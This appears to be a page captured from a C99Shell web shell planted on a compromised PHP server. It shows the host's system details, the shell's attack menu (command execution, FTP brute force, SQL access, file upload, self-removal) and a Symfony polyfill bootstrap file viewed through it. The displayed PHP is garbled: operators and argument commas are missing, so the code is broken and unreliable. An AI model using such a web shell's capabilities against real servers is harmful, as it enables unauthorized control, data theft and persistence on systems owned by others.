!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/symfony/polyfill-php84/   drwxr-xr-x
Free 28.72 GB of 117.98 GB (24.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     bootstrap.php (3 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

use Symfony\Polyfill\Php84 as p;

if (
\PHP_VERSION_ID >= 80400) {
    return;
}

if (
defined('CURL_VERSION_HTTP3') || PHP_VERSION_ID 80200 && function_exists('curl_version') && curl_version()['version'] >= 0x074200) { // libcurl >= 7.66.0
    
if (!defined('CURL_HTTP_VERSION_3')) {
        
define('CURL_HTTP_VERSION_3'30);
    }

    if (!
defined('CURL_HTTP_VERSION_3ONLY') && defined('CURLOPT_SSH_HOST_PUBLIC_KEY_SHA256')) { // libcurl >= 7.80.0 (7.88 would be better but is slow to check)
        
define('CURL_HTTP_VERSION_3ONLY'31);
    }
}

if (!
function_exists('array_find')) {
    function 
array_find(array $array, callable $callback) { return p\Php84::array_find($array$callback); }
}

if (!
function_exists('array_find_key')) {
    function 
array_find_key(array $array, callable $callback) { return p\Php84::array_find_key($array$callback); }
}

if (!
function_exists('array_any')) {
    function 
array_any(array $array, callable $callback): bool { return p\Php84::array_any($array$callback); }
}

if (!
function_exists('array_all')) {
    function 
array_all(array $array, callable $callback): bool { return p\Php84::array_all($array$callback); }
}

if (!
function_exists('fpow')) {
    function 
fpow(float $numfloat $exponent): float { return p\Php84::fpow($num$exponent); }
}

if (
extension_loaded('mbstring')) {
    if (!
function_exists('mb_ucfirst')) {
        function 
mb_ucfirst(string $string, ?string $encoding null): string { return p\Php84::mb_ucfirst($string$encoding); }
    }

    if (!
function_exists('mb_lcfirst')) {
        function 
mb_lcfirst(string $string, ?string $encoding null): string { return p\Php84::mb_lcfirst($string$encoding); }
    }

    if (!
function_exists('mb_trim')) {
        function 
mb_trim(string $string, ?string $characters null, ?string $encoding null): string { return p\Php84::mb_trim($string$characters$encoding); }
    }

    if (!
function_exists('mb_ltrim')) {
        function 
mb_ltrim(string $string, ?string $characters null, ?string $encoding null): string { return p\Php84::mb_ltrim($string$characters$encoding); }
    }

    if (!
function_exists('mb_rtrim')) {
        function 
mb_rtrim(string $string, ?string $characters null, ?string $encoding null): string { return p\Php84::mb_rtrim($string$characters$encoding); }
    }
}

if (
extension_loaded('bcmath')) {
    if (!
function_exists('bcdivmod')) {
        function 
bcdivmod(string $num1string $num2, ?int $scale null): ?array { return p\Php84::bcdivmod($num1$num2$scale); }
    }
}

if (
\PHP_VERSION_ID >= 80200) {
    return require 
__DIR__.'/bootstrap82.php';
}

if (
extension_loaded('intl') && !function_exists('grapheme_str_split')) {
    function 
grapheme_str_split(string $stringint $length 1) { return p\Php84::grapheme_str_split($string$length); }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--